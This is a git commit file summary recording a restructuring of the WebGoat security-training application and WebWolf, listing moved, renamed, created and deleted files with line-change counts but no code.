 .../webwolf/user/UserServiceTest.java         |    2 +-
 .../application-webgoat-test.properties       |    8 +
 .../resources/application-webwolf.properties  |    5 +-
 .../test/resources/logback-test.xml           |    0
 docker/start.sh => start.sh                   |   31 +-
 webgoat-container/.gitignore                  |    8 -
 webgoat-container/pom.xml                     |  111 --
 .../owasp/webgoat/DatabaseConfiguration.java  |   56 -
 .../service/LessonProgressService.java        |  102 -
 .../org/owasp/webgoat/TestApplication.java    |   33 -
 .../webgoat/service/LabelServiceTest.java     |   77 -
 .../plugins/lessonSolutions/rewrite_test.html |   11 -
 webgoat-integration-tests/pom.xml             |   73 -
 .../java/org/owasp/webgoat/ChallengeTest.java |  114 --
 .../resources/application-inttest.properties  |   10 -
 .../src/test/resources/logback-test.xml       |   15 -
 webgoat-lessons/auth-bypass/.DS_Store         |  Bin 8196 -> 0 bytes
 webgoat-lessons/auth-bypass/pom.xml           |   12 -
 webgoat-lessons/auth-bypass/src/.DS_Store     |  Bin 8196 -> 0 bytes
 .../auth-bypass/src/main/.DS_Store            |  Bin 10244 -> 0 bytes
 .../auth-bypass/src/main/java/.DS_Store       |  Bin 8196 -> 0 bytes
 .../auth-bypass/src/main/java/org/.DS_Store   |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/.DS_Store         |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/webgoat/.DS_Store |  Bin 8196 -> 0 bytes
 .../auth-bypass/src/main/resources/.DS_Store  |  Bin 6148 -> 0 bytes
 .../src/main/resources/html/.DS_Store         |  Bin 6148 -> 0 bytes
 webgoat-lessons/bypass-restrictions/pom.xml   |   11 -
 webgoat-lessons/challenge/pom.xml             |   31 -
 .../challenges/challenge1/ImageServlet.java   |   43 -
 .../src/main/resources/html/Challenge.html    |    9 -
 webgoat-lessons/chrome-dev-tools/pom.xml      |   11 -
 webgoat-lessons/cia/pom.xml                   |   11 -
 webgoat-lessons/client-side-filtering/pom.xml |   12 -
 .../lessonPlans/ru/ClientSideFiltering.html   |   11 -
 .../cross-site-scripting/.gitignore           |    1 -
 .../cross-site-scripting/.sonatype            |    3 -
 webgoat-lessons/cross-site-scripting/pom.xml  |   19 -
 webgoat-lessons/crypto/pom.xml                |   12 -
 .../lessonSolutions/en/crypto_solution.adoc   |    5 -
 .../lessonSolutions/html/crypto.html          |   14 -
 webgoat-lessons/csrf/pom.xml                  |   11 -
 webgoat-lessons/csrf/src/.DS_Store            |  Bin 6148 -> 0 bytes
 webgoat-lessons/csrf/src/main/.DS_Store       |  Bin 8196 -> 0 bytes
 webgoat-lessons/csrf/src/main/java/.DS_Store  |  Bin 6148 -> 0 bytes
 .../csrf/src/main/java/org/.DS_Store          |  Bin 6148 -> 0 bytes
 .../csrf/src/main/java/org/owasp/.DS_Store    |  Bin 6148 -> 0 bytes
 .../src/main/java/org/owasp/webgoat/.DS_Store |  Bin 6148 -> 0 bytes
 .../csrf/src/main/resources/.DS_Store         |  Bin 6148 -> 0 bytes
 .../src/main/resources/lessonPlans/.DS_Store  |  Bin 6148 -> 0 bytes
 .../csrf/webgoat-lesson-template/.DS_Store    |  Bin 8196 -> 0 bytes
 .../webgoat-lesson-template/src/.DS_Store     |  Bin 8196 -> 0 bytes
 .../src/main/.DS_Store                        |  Bin 10244 -> 0 bytes
 .../src/main/java/.DS_Store                   |  Bin 8196 -> 0 bytes
 .../src/main/java/org/.DS_Store               |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/.DS_Store         |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/webgoat/.DS_Store |  Bin 8196 -> 0 bytes
 .../src/main/resources/.DS_Store              |  Bin 6148 -> 0 bytes
 .../src/main/resources/html/.DS_Store         |  Bin 6148 -> 0 bytes
 webgoat-lessons/hijack-session/pom.xml        |   58 -
 webgoat-lessons/html-tampering/pom.xml        |   27 -
 webgoat-lessons/http-basics/pom.xml           |   12 -
 .../resources/lessonPlans/de/HttpBasics.html  |   29 -
 .../lessonPlans/nl/HttpBasics_content1.adoc   |    8 -
 .../resources/lessonPlans/ru/HttpBasics.html  |   33 -
 .../en/HttpBasics_solution.adoc               |    5 -
 .../lessonSolutions/html/HttpBasics.html      |   14 -
 webgoat-lessons/http-proxies/pom.xml          |   25 -
 webgoat-lessons/idor/pom.xml                  |   12 -
 .../insecure-deserialization/pom.xml          |   26 -
 webgoat-lessons/insecure-login/pom.xml        |   25 -
 webgoat-lessons/jwt/pom.xml                   |   26 -
 webgoat-lessons/logging/pom.xml               |   25 -
 webgoat-lessons/missing-function-ac/.DS_Store |  Bin 8196 -> 0 bytes
 webgoat-lessons/missing-function-ac/pom.xml   |   12 -
 .../missing-function-ac/src/.DS_Store         |  Bin 8196 -> 0 bytes
 .../missing-function-ac/src/main/.DS_Store    |  Bin 10244 -> 0 bytes
 .../src/main/java/.DS_Store                   |  Bin 8196 -> 0 bytes
 .../src/main/java/org/.DS_Store               |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/.DS_Store         |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/webgoat/.DS_Store |  Bin 8196 -> 0 bytes
 .../src/main/resources/.DS_Store              |  Bin 6148 -> 0 bytes
 .../src/main/resources/html/.DS_Store         |  Bin 6148 -> 0 bytes
 webgoat-lessons/password-reset/pom.xml        |   20 -
 webgoat-lessons/path-traversal/pom.xml        |   11 -
 webgoat-lessons/pom.xml                       |   90 -
 webgoat-lessons/secure-passwords/pom.xml      |   19 -
 webgoat-lessons/spoof-cookie/pom.xml          |   58 -
 webgoat-lessons/sql-injection/.sonatype       |    3 -
 webgoat-lessons/sql-injection/pom.xml         |   11 -
 .../en/SqlInjection_solution.adoc             |    5 -
 .../lessonSolutions/html/SqlInjection.html    |   14 -
 webgoat-lessons/ssrf/pom.xml                  |   26 -
 .../vulnerable-components/.gitignore          |    1 -
 webgoat-lessons/vulnerable-components/pom.xml |   54 -
 .../en/VulnerableComponents_solution.adoc     |    5 -
 .../html/VulnerableComponents.html            |   14 -
 webgoat-lessons/webgoat-introduction/pom.xml  |   11 -
 .../resources/html/WebGoatIntroduction.html   |    8 -
 .../lessonPlans/nl/Introduction.adoc          |   16 -
 .../webgoat-lesson-template/.DS_Store         |  Bin 8196 -> 0 bytes
 .../getting-started.MD                        |   65 -
 .../webgoat-lesson-template/pom.xml           |   12 -
 .../webgoat-lesson-template/src/.DS_Store     |  Bin 8196 -> 0 bytes
 .../src/main/.DS_Store                        |  Bin 10244 -> 0 bytes
 .../src/main/java/.DS_Store                   |  Bin 8196 -> 0 bytes
 .../src/main/java/org/.DS_Store               |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/.DS_Store         |  Bin 8196 -> 0 bytes
 .../src/main/java/org/owasp/webgoat/.DS_Store |  Bin 8196 -> 0 bytes
 .../src/main/resources/.DS_Store              |  Bin 6148 -> 0 bytes
 .../src/main/resources/html/.DS_Store         |  Bin 6148 -> 0 bytes
 .../en/lesson-template-content.adoc           |   36 -
 .../lessonPlans/en/lesson-template-glue.adoc  |   59 -
 webgoat-lessons/webwolf-introduction/pom.xml  |   11 -
 .../lessonPlans/nl/IntroductionWebWolf.adoc   |   25 -
 webgoat-lessons/xxe/pom.xml                   |   31 -
 webgoat-server/Dockerfile                     |   17 -
 webgoat-server/pom.xml                        |  229 ---
 .../owasp/webgoat/HSQLDBDatabaseConfig.java   |   65 -
 .../java/org/owasp/webgoat/StartWebGoat.java  |   80 -
 webwolf/Dockerfile                            |   16 -
 webwolf/README.md                             |   46 -
 webwolf/pom.xml                               |  155 --
 .../main/java/org/owasp/webwolf/WebWolf.java  |   73 -
 .../webwolf/db/ActuatorDsJsonParser.java      |   58 -
 .../webwolf/db/DataSourceProperties.java      |   52 -
 .../owasp/webwolf/db/DataSourceResolver.java  |  111 --
 .../db/ResourceUnavailableException.java      |   22 -
 .../webwolf/user/RegistrationController.java  |   69 -
 .../org/owasp/webwolf/user/UserValidator.java |   57 -
 .../main/resources/i18n/messages.properties   |   40 -
 .../owasp/webwolf/user/UserValidatorTest.java |   96 -
 webwolf/src/test/resources/logback-test.xml   |   16 -
 webwolf/start-webwolf.sh                      |    7 -
 1130 files changed, 3540 insertions(+), 7643 deletions(-)
 create mode 100644 .dockerignore
 delete mode 100644 .github/workflows/branch_build.yml
 create mode 100644 .github/workflows/build.yml
 delete mode 100644 .github/workflows/pr_build.yml
 create mode 100644 Dockerfile
 delete mode 100644 config/pmd/pmd-ruleset.xml
 delete mode 100644 docker/Dockerfile
 delete mode 100644 docker/Readme.md
 delete mode 100644 docker/index.html
 delete mode 100644 docker/nginx.conf
 delete mode 100644 docker/pom.xml
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java => src/it/java/org/owasp/webgoat/AccessControlIntegrationTest.java (92%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/CSRFTest.java => src/it/java/org/owasp/webgoat/CSRFIntegrationTest.java (88%)
 create mode 100644 src/it/java/org/owasp/webgoat/ChallengeIntegrationTest.java
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/CryptoTest.java => src/it/java/org/owasp/webgoat/CryptoIntegrationTest.java (95%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/DeserializationTest.java => src/it/java/org/owasp/webgoat/DeserializationIntegrationTest.java (86%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java => src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java (97%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/IDORTest.java => src/it/java/org/owasp/webgoat/IDORIntegrationTest.java (98%)
 rename {webgoat-integration-tests/src/test => src/it}/java/org/owasp/webgoat/IntegrationTest.java (61%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java => src/it/java/org/owasp/webgoat/JWTLessonIntegrationTest.java (98%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java => src/it/java/org/owasp/webgoat/PasswordResetLessonIntegrationTest.java (87%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java => src/it/java/org/owasp/webgoat/PathTraversalIntegrationTest.java (88%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/ProgressRaceConditionTest.java => src/it/java/org/owasp/webgoat/ProgressRaceConditionIntegrationTest.java (93%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SSRFTest.java => src/it/java/org/owasp/webgoat/SSRFIntegrationTest.java (91%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SeleniumTest.java => src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java (88%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SessionManagementTest.java => src/it/java/org/owasp/webgoat/SessionManagementIntegrationTest.java (96%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionAdvancedTest.java => src/it/java/org/owasp/webgoat/SqlInjectionAdvancedIntegrationTest.java (96%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionLessonTest.java => src/it/java/org/owasp/webgoat/SqlInjectionLessonIntegrationTest.java (97%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/SqlInjectionMitigationTest.java => src/it/java/org/owasp/webgoat/SqlInjectionMitigationIntegrationTest.java (94%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/WebWolfTest.java => src/it/java/org/owasp/webgoat/WebWolfIntegrationTest.java (93%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/XSSTest.java => src/it/java/org/owasp/webgoat/XSSIntegrationTest.java (98%)
 rename webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java => src/it/java/org/owasp/webgoat/XXEIntegrationTest.java (77%)
 rename {webgoat-lessons/insecure-deserialization/src => src}/main/java/org/dummy/insecure/framework/VulnerableTaskHolder.java (96%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/AjaxAuthenticationEntryPoint.java (97%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/AsciiDoctorTemplateResolver.java (57%)
 create mode 100644 src/main/java/org/owasp/webgoat/container/DatabaseConfiguration.java
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/HammerHead.java (85%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/LessonDataSource.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/LessonTemplateResolver.java (89%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/MvcConfiguration.java (61%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/WebGoat.java (81%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/WebSecurityConfig.java (95%)
 create mode 100644 src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/EnvironmentExposure.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/OperatingSystemMacro.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/UsernameMacro.java (80%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/WebGoatTmpDirMacro.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/WebGoatVersionMacro.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/WebWolfMacro.java (88%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/asciidoc/WebWolfRootMacro.java (90%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/assignments/AssignmentEndpoint.java (86%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/assignments/AssignmentHints.java (87%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/assignments/AssignmentPath.java (90%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/assignments/AttackResult.java (93%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/assignments/LessonTrackerInterceptor.java (90%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/controller/StartLesson.java (63%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/controller/Welcome.java (88%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/i18n/Language.java (97%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/i18n/Messages.java (97%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/i18n/PluginMessages.java (77%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/Assignment.java (86%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/Category.java (98%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/CourseConfiguration.java (91%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/Hint.java (96%)
 create mode 100644 src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/Lesson.java (89%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/LessonConnectionInvocationHandler.java (76%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/LessonInfoModel.java (87%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/LessonMenuItem.java (97%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/lessons/LessonMenuItemType.java (96%)
 create mode 100644 src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
 create mode 100644 src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/HintService.java (76%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/LabelDebugService.java (86%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/LabelService.java (54%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/LessonInfoService.java (79%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/LessonMenuService.java (77%)
 create mode 100644 src/main/java/org/owasp/webgoat/container/service/LessonProgressService.java
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/LessonTitleService.java (84%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/ReportCardService.java (89%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/RestartLessonService.java (82%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/service/SessionService.java (86%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/session/Course.java (83%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/session/LabelDebugger.java (84%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/session/UserSessionData.java (94%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/session/WebSession.java (92%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/LessonTracker.java (93%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/RegistrationController.java (95%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/Scoreboard.java (62%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserForm.java (93%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserRepository.java (88%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserService.java (89%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserSession.java (90%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserTracker.java (96%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserTrackerRepository.java (84%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/UserValidator.java (95%)
 rename {webgoat-container/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/container}/users/WebGoatUser.java (89%)
 rename {webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/auth_bypass/AccountVerificationHelper.java (98%)
 rename {webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/auth_bypass/AuthBypass.java (89%)
 rename {webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/auth_bypass/VerifyAccount.java (91%)
 rename {webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/bypass_restrictions/BypassRestrictions.java (89%)
 rename {webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/bypass_restrictions/BypassRestrictionsFieldRestrictions.java (92%)
 rename {webgoat-lessons/bypass-restrictions/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/bypass_restrictions/BypassRestrictionsFrontendValidation.java (93%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/ChallengeIntro.java (65%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/Email.java (96%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/Flag.java (90%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/SolutionConstants.java (96%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge1/Assignment1.java (88%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge1/Challenge1.java (67%)
 create mode 100644 src/main/java/org/owasp/webgoat/lessons/challenges/challenge1/ImageServlet.java
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge5/Assignment5.java (90%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge5/Challenge5.java (89%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge7/Assignment7.java (90%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge7/Challenge7.java (67%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge7/MD5.java (99%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge7/PasswordResetLink.java (95%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge8/Assignment8.java (91%)
 rename {webgoat-lessons/challenge/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/challenges/challenge8/Challenge8.java (67%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/chrome_dev_tools/ChromeDevTools.java (90%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/chrome_dev_tools/NetworkDummy.java (89%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/chrome_dev_tools/NetworkLesson.java (90%)
 rename {webgoat-lessons/cia/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/cia/CIA.java (70%)
 rename {webgoat-lessons/cia/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/cia/CIAQuiz.java (90%)
 rename {webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/client_side_filtering/ClientSideFiltering.java (90%)
 rename {webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/client_side_filtering/ClientSideFilteringAssignment.java (88%)
 rename {webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/client_side_filtering/ClientSideFilteringFreeAssignment.java (88%)
 rename {webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/client_side_filtering/Salaries.java (97%)
 rename {webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/client_side_filtering/ShopEndpoint.java (88%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/CryptoUtil.java (98%)
 rename webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto/Crypto.java => src/main/java/org/owasp/webgoat/lessons/cryptography/Cryptography.java (87%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/EncodingAssignment.java (94%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/HashingAssignment.java (94%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/SecureDefaultsAssignment.java (90%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/SigningAssignment.java (93%)
 rename {webgoat-lessons/crypto/src/main/java/org/owasp/webgoat/crypto => src/main/java/org/owasp/webgoat/lessons/cryptography}/XOREncodingAssignment.java (88%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/CSRF.java (90%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/CSRFConfirmFlag1.java (88%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/CSRFFeedback.java (94%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/CSRFGetFlag.java (95%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/CSRFLogin.java (87%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/ForgedReviews.java (93%)
 rename {webgoat-lessons/csrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/csrf/Review.java (97%)
 rename {webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/deserialization/InsecureDeserialization.java (91%)
 rename {webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/deserialization/InsecureDeserializationTask.java (93%)
 rename {webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/deserialization/SerializationHelper.java (97%)
 rename {webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/hijacksession/HijackSession.java (90%)
 rename {webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/hijacksession/HijackSessionAssignment.java (88%)
 rename {webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/hijacksession/cas/Authentication.java (97%)
 rename {webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/hijacksession/cas/AuthenticationProvider.java (95%)
 rename {webgoat-lessons/hijack-session/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/hijacksession/cas/HijackSessionAuthenticationProvider.java (98%)
 rename {webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/html_tampering/HtmlTampering.java (91%)
 rename {webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/html_tampering/HtmlTamperingTask.java (88%)
 rename {webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/http_basics/HttpBasics.java (90%)
 rename {webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/http_basics/HttpBasicsLesson.java (88%)
 rename {webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/http_basics/HttpBasicsQuiz.java (87%)
 rename {webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/http_proxies/HttpBasicsInterceptRequest.java (93%)
 rename {webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/http_proxies/HttpProxies.java (91%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDOR.java (91%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDORDiffAttributes.java (90%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDOREditOtherProfiile.java (94%)
